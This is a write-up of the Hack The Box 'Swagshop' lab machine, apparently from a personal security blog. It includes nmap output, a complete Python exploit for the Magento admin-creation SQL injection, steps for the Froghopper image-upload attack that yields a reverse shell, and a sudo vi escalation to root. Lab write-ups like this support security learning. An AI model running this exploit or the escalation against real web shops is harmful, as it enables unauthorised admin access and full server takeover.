Hack The Box - Swagshop Writeup

3 minute read

Hack The Box - Swagshop

Enumeration

Lets start by enumerating

Nmap

Starting with nmap

nmap -sC -sV 10.10.10.140

# Nmap 7.70 scan initiated Thu Aug 29 15:03:29 2019 as: nmap -sC -sV -oA nmap 10.10.10.140
Nmap scan report for ip-10-10-10-140.ap-south-1.compute.internal (10.10.10.140)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://10.10.10.140/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 29 15:04:15 2019 -- 1 IP address (1 host up) scanned in 45.63 seconds

There seems to be a Magento web app running on port 80. Let enumerate further ()

Directory Buster

directory buster found an admin login page

image1

Vulnerability

Searchsploit

root@kali:~# searchsploit magento
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Adm | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adm | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' C | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserializ | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a -  | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclos | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execut | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXt | exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted | exploits/php/webapps/38651.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

I had to try most of these to find the right one. The issue is a time based sql injection

Exploit

Exploitation

I modified the python script to correct the url and added a user named joe123 with password forme

import requests
import base64
import sys

target = "http://10.10.10.140/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,
`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES
('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES 
(1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="joe123", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is
#print target_url
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

And now we can login into the application.

Usershell

For usershell I used a magento vulnerabillity known as froghopper

Froghopper Attack

To trigger this we have to complete a series of steps.

image1

2. Now we have to upload a image file containing our php code. I uploaded it in the favicon option

image1

3. Now we have to create create newsletter template with a reference to the image

image1

4. Start a netcat listener and preview the template

image1

And we have a shell

Privilege Escalation

I copied the LinuxEnum.sh file to the machine and ran it and found some interesting output.

 
User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

[+] Possible sudo pwnage!
/usr/bin/vi

So we can run vim as root. So lets try pwning using vim

$ sudo /usr/bin/vi /var/www/html/test1
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
  
~
~
~
~
:shell

id
uid=0(root) gid=0(root) groups=0(root)

We have a root shell. Pwned!

Solved

Tags:

Categories:

Updated:

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.